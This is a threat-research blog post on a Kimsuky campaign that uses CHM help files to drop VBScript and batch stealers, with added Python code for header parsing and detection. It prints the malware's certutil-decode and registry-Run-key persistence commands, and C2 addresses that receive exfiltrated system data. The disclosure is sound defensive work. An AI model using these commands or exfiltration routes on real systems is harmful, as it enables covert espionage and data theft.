Last updated Thursday, 21 March 2024, 13:20:04 GMT

Co-authored by Christiaan Beek and Raj Samani

Within Rapid7 Labs we continuously track and monitor threat groups. This is one of our key areas of focus as we work to ensure that our ability to protect customers remains constant. As part of this process, we routinely identify evolving tactics from threat groups in what is an unceasing game of cat and mouse.

Our team recently ran across some interesting activity that we believe is the work of the Kimsuky threat actor group, also known as Black Banshee or Thallium. Originating from North Korea and active since at least 2012, Kimsuky focuses primarily on intelligence gathering. The group is known to have targeted South Korean government entities, individuals involved in the Korean peninsula unification process, and global experts in various fields relevant to the regime's interests. In recent years, Kimsuky's activity has also expanded across the Asia-Pacific region, affecting Japan, Vietnam, Thailand, etc.

Through our research, we saw an updated playbook that underscores Kimsuky’s efforts to bypass modern security measures. Their evolution in tactics, techniques, and procedures (TTPs) underscores the dynamic nature of cyber espionage and the continuous arms race between threat actors and defenders.

In this blog we will detail new techniques that we have observed used by this actor group over the recent months. We believe that sharing these evolving techniques gives defenders the latest insights into measures required to protect their assets.

Anatomy of the Attack

Let’s begin by highlighting where we started our analysis of Kimsuky and how the more we investigated, the more we discovered — to the point where we believe we observed a new wave of attacks by this actor.

Upon identification of a target, typically we would anticipate the reconnaissance phase to initiate in an effort to identify methods to allow access into the target. Since Kimsuky's focus is on intelligence gathering, gaining access needs to remain undetected; subsequently, the intrusion is designed so that it does not trigger alerts.

Over the years, we have observed a change in the group's methods, starting with weaponized Office documents, then ISO files, and beginning last year, the abuse of shortcut files (LNK files). By disguising these LNK files as benign documents or files, the attackers trick users into executing them. PowerShell commands, or even full binaries, are hidden inside the LNK files, all invisible to an end user who only sees the surface.

Our latest findings lead us to observations that we believe are Kimsuky using CHM files, which are delivered in several ways: as part of an ISO, VHD, ZIP or RAR file. The reason they would use this approach is that such containers have the ability to pass the first line of defense, after which the CHM file will be executed.

CHM files, or Compiled HTML Help files, are a proprietary format for online help files developed by Microsoft. They contain a collection of HTML pages together with a table of contents, an index, and full-text search functionality. Essentially, CHM files are used to display help documentation in a structured, navigable format. They are compiled using Microsoft HTML Help Workshop and can include text, images, and hyperlinks, similar to web pages, all packaged into a single compressed file with a .chm extension.

Although originally designed for help documentation, CHM files have also been used for malicious purposes, such as distributing malware, because they can execute JavaScript when opened. A CHM file is a small archive that can be unpacked with archive extraction tools, which exposes its contents for analysis.

The first scenario in our analysis can be visualized as follows:

The Nuclear Lure

While tracking activity, we first discovered a CHM file that caught our attention.

Hash    Value
MD5     364d4fdf430477222fe854b3cd5b6d40
SHA1    b5224224fdbabdea53a91a96e9f816c6f9a8708c
SHA256  c62677543eeb50e0def44fc75009a7748cdbedd0a3ccf62f50d7f219f6a5aa05

Analyzing the file in a controlled environment, we observed that the CHM file contains the following files and structure:

The file names are in Korean. With the help of translation software, the file names are:

  • [title] reveals North Korea's nuclear strategy.html
  • Incomplete.html
  • Factors and types of North Korea's use of nuclear weapons.html
  • North Korea's nuclear crisis escalation model and the determinants of nuclear use.html
  • Introduction.html
  • Previous research review.html
  • Research background and purpose.html

These HTML files link to the main HTML file 'home.html', which we will return to later.

Each file type has its own unique characteristics; from a file forensics perspective, let's look at the file header:

Raw bytes    Value   Comment
0x49545346   ITSF    File header ID of a CHM file
0x03         3       Version number
...                  (fields skipped)
0x1204       0412    Windows Language ID

A language ID value of 0412 means "Korean - Korea". This can be translated to mean that the Windows operating system used to create this CHM file was running with the Korean language.
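As an added illustration of the header check described above (this is not code from the Rapid7 write-up), the following Python parses the fixed part of a CHM (ITSF) header and labels the Windows language ID; the sample header bytes are constructed here, not taken from the real file, and the ITSF field offsets are assumed from the publicly documented CHM layout.

```python
import struct

# Windows language IDs (LCIDs) relevant to this write-up; 0x0412 is "Korean - Korea".
LANGUAGE_IDS = {
    0x0409: "English - United States",
    0x0411: "Japanese - Japan",
    0x0412: "Korean - Korea",
    0x0804: "Chinese - PRC",
}

# ITSF header layout (byte offsets): 0x00 'ITSF' magic, 0x04 version, 0x08 total
# header length, 0x0C unknown (usually 1), 0x10 timestamp, 0x14 Windows language ID.
ITSF_FIXED = struct.Struct("<4sIIIII")  # magic + five little-endian DWORDs


def parse_itsf_header(data: bytes) -> dict:
    """Parse the fixed part of a CHM (ITSF) header and label the language ID."""
    if len(data) < ITSF_FIXED.size:
        raise ValueError("file too short to hold an ITSF header")
    magic, version, header_len, _unknown, timestamp, lang_id = ITSF_FIXED.unpack_from(data)
    if magic != b"ITSF":
        raise ValueError(f"not a CHM file: magic {magic!r} (expected b'ITSF')")
    return {
        "magic": magic.decode("ascii"),            # bytes 49 54 53 46 on disk
        "version": version,
        "header_length": header_len,
        "timestamp": timestamp,
        "language_id": lang_id,
        "language_id_raw": data[0x14:0x18].hex(),  # little-endian, as seen in a hex dump
        "language": LANGUAGE_IDS.get(lang_id, f"unknown LCID 0x{lang_id:04x}"),
    }


def build_sample_header(lang_id: int = 0x0412) -> bytes:
    """Constructed sample: a minimal version-3 ITSF header, not bytes from the real sample."""
    header = ITSF_FIXED.pack(b"ITSF", 3, 0x60, 1, 0, lang_id)
    return header + bytes(0x60 - len(header))  # pad to the declared header length


if __name__ == "__main__":
    for key, value in parse_itsf_header(build_sample_header()).items():
        print(f"{key:>16}: {value}")
```

Point the parser at the first 0x60 bytes of a real .chm to confirm the "12 04 00 00" bytes at offset 0x14 that the table above shows as 0x1204.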

When the CHM file is executed, it displays the following:

The page in the right pane is the 'home.html' file. This page contains an interesting piece of code:

The code snippet above is an example of using HTML and ActiveX to execute arbitrary commands on a Windows machine, typically for malicious purposes. The value assigned to a 'Button' contains a command line with Base64 code in it as another obfuscation technique, followed by a living-off-the-land technique that creates persistence on the victim's system to run the content.

Let's break it down and understand what the actor is doing:

1. Base64-encoded VBScript execution (T1059.003):

  • echo T24gRXJyb3IgUmVzdW1lIE5leHQ...: This part echoes a Base64-encoded string into a file. Once decoded, the string is VBScript code, designed to be executed on the victim's machine. The decoded Base64 value is:

2. Saving to a .dat file:

  • >"%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.dat": The echoed Base64 string is redirected and saved to a .dat file in the current user's Links directory. The file name appears to be randomly generated or obfuscated to avoid easy detection.

3. Decoding the .dat file:

  • start /MIN certutil -decode "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.dat" "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.vbs": This uses the certutil utility (a legitimate Windows tool) to decode the Base64-encoded .dat file back into a .vbs (VBScript) file. The /MIN flag starts the process minimized to reduce suspicion.

4. Persistence via registry modification (T1547.001):

  • start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.vbs" /f: This adds a new entry to the Windows Registry under the Run key for the current user (HKCU stands for HKEY_CURRENT_USER). This registry path is used by Windows to determine which programs should run automatically at startup. The command ensures that the decoded VBScript runs every time the user logs in, achieving persistence on the infected system.
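As an added defender-side illustration (not code from the Rapid7 write-up), the following Python classifies process-creation events against the behaviors of the four-step command chain above, using the detection names listed at the end of this post, and decodes the Base64 token after "echo" to confirm it is VBScript. The event fields, the sample paths and the truncated Base64 token are constructed for this example.

```python
import base64
import re

# Constructed process-creation events modelled on the command chain above.
# The Base64 token is truncated to its first 20 decoded bytes on purpose.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\hh.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c echo T24gRXJyb3IgUmVzdW1lIE5leHQ= >"%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.dat" & '
                r'start /MIN certutil -decode "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.dat" "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.vbs"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r'certutil -decode "C:\Users\victim\Links\MXFhejJ3c3gzZWRjA.dat" "C:\Users\victim\Links\MXFhejJ3c3gzZWRjA.vbs"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "C:\Users\victim\Links\MXFhejJ3c3gzZWRjA.vbs" /f'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)  # Run, not RunOnce


def classify(event: dict) -> list[str]:
    """Return the detection names (as listed in the write-up) that one event matches."""
    parent, image, cmd = (event[k].lower() for k in ("parent", "image", "cmdline"))
    hits = []
    if parent.endswith("\\hh.exe"):  # the HTML Help viewer should not be a process parent
        hits.append("Suspicious Process - HH.exe Spawns Child Process")
        if image.endswith("\\cmd.exe") and "certutil" in cmd and "-decode" in cmd:
            hits.append("Suspicious Process - CHM File Runs CMD.exe to Run Certutil")
    if image.endswith("\\reg.exe") and " add " in f" {cmd} " and RUN_KEY.search(cmd):
        hits.append("Persistence - Run Key Added By Reg.exe")
        if ".vbs" in cmd:
            hits.append("Persistence - VBS Script Added to Registry Run Key")
    return hits


def echoed_base64_preview(cmdline: str, limit: int = 40) -> str:
    """Decode the Base64 token after 'echo' so an analyst can see what the .dat will hold."""
    m = re.search(r"\becho\s+([A-Za-z0-9+/=]{16,})", cmdline)
    if not m:
        return ""
    token = m.group(1)
    token += "=" * (-len(token) % 4)  # re-pad if the '=' was dropped from the log line
    try:
        return base64.b64decode(token).decode("latin-1")[:limit]
    except ValueError:
        return ""


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run every event through classify(); returns (event index, detection name) pairs."""
    return [(i, name) for i, ev in enumerate(events) for name in classify(ev)]
```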

But what content is downloaded from the URL, decoded and written into that VBS file? The URL of the command-and-control server hosts an HTML page that contains VBS code:

Analyzing the code, it does several things on the victim's machine:

The function ‘SyInf()’ collects basic system information using WMI (Windows Management Instrumentation) and constructs a string with all these details. What is gathered:

  • Computer name, owner, manufacturer, model, system type.
  • Operating system details, version, build number, total visible memory.
  • Processor details, including caption and clock speed.

Other functions in the code collect the processes running on the system, recent Word files, and list the directories and files of specific folders. In our example, the actor was interested in the contents of the Downloads folder.

Once the code has collected the requested information, it is all Base64-encoded, stored in the file 'info.txt', and exfiltrated to a remote server:

ui = "00701111.000webhostapp.com/wp-extra"

After the information is sent, the C2 responds with the following message:

This C2 server is still active, and although we have seen activity from September 2023 onwards, we have also observed activity in 2024.

New Campaign Discovered

Pivoting on some unique strings in the stealer code and hunting for more CHM files, we discovered additional files, some also dating back to the second half of 2023, but also 2024 hits.

In VirusTotal, we discovered the following file:

Hash    Value
MD5     71db2ae9c36403cec1fd38864d64f239
SHA1    5c7b2705155023e6e438399d895d30bf924e0547
SHA256  e8000ddfddbe120b5f2fb3677abbad901615d1abd01a0de204fade5d2dd5ad0d

The file is a VBS script and it contains similar code to what we described earlier on the information gathering script above. Many components are the same, with small differences in what type of data is being gathered.

The biggest difference is a different C2 server, which makes sense. Below is the full path, with its parts concatenated, that the VBS script uses when it runs:

hxxp://gosiweb.gosiclass[.] com/m/gnu/convert/html/com/list.php?query=6

The modus operandi and the reuse of code and tools show that the threat actor is actively using and refining/reshaping its techniques and tactics to gather intelligence from victims.

Still More? Yes, Another Method Discovered

Using the characteristics of the previously discovered CHM files, we developed internal YARA hunting rules, through which we discovered the following CHM file:

Hash    Value
MD5     f35b05779e9538cec363ca37ab38e287
SHA1    d4fa57f9c9e35222a8cacddc79055c1d76907fb9
SHA256  da79eea1198a1a10e2ffd50fd949521632d8f252fb1aadb57a45218482b9fd89

In this particular case, multiple files are present: .bat files and VBS scripts.

In a similar manner, the HTML file in the directory contains hidden code:

style="visibility:hidden;">

After the CHM file is executed, all files are dropped into the C:\Users\Public\Libraries directory and start running. First, a persistent scheduled task is created using the '2034923.bat' file:

The VBS script first creates a service, after which another .bat file is executed; each file has a different function.

The '9583423.bat' script collects information from the system and stores it in a text file:

In the code above, once the information has been collected, the file is picked up by the '1295049.bat' script, which contains the PowerShell code to set up the connection to the C2 server with the right path, Base64-encode the stream, and transfer it:

Combining the code from the previous .bat file with the code below, the path to the C2 is created:

hxxps://niscarea[.]com/in.php?cn=[base64]&fn=[DateTime]

The collected file containing the system information is Base64-encoded, zipped and sent to the C2. After sending, the file is deleted from the local system.

The sys.txt file contains information about the victim's system such as OS, CPU architecture, etc. Below is a short sample of the content:

The overall flow of this attack can be simplified in this visualization:

Attack Prevalence

Since this is an active campaign, tracking prevalence is based at the time of this writing. However, Rapid7 Labs telemetry enables us to confirm that we have identified targeted attacks against entities based in South Korea. Moreover, as we apply our approach to determine attribution, such as the overlap in code and tactics, we have moderate confidence* in attributing this campaign to the Kimsuky group.

All IOCs are freely available in our Rapid7 Labs repository here.

Rapid7 Customers

InsightIDR and Managed Detection and Response (MDR) customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections deployed and alerting on activity related to these techniques and research:

Persistence - Run Key Added By Reg.exe

Suspicious Process - HH.exe Spawns Child Process

Suspicious Process - CHM File Runs CMD.exe to Run Certutil

Persistence - VBS Script Added to Registry Run Key

*In threat research terms, "moderate confidence" means that we have a significant amount of evidence that the activity we are observing is similar to what we have observed from a specific group or actor in the past; however, there is always the possibility that someone is mimicking that behavior. Therefore, we use "moderate" rather than "high" confidence.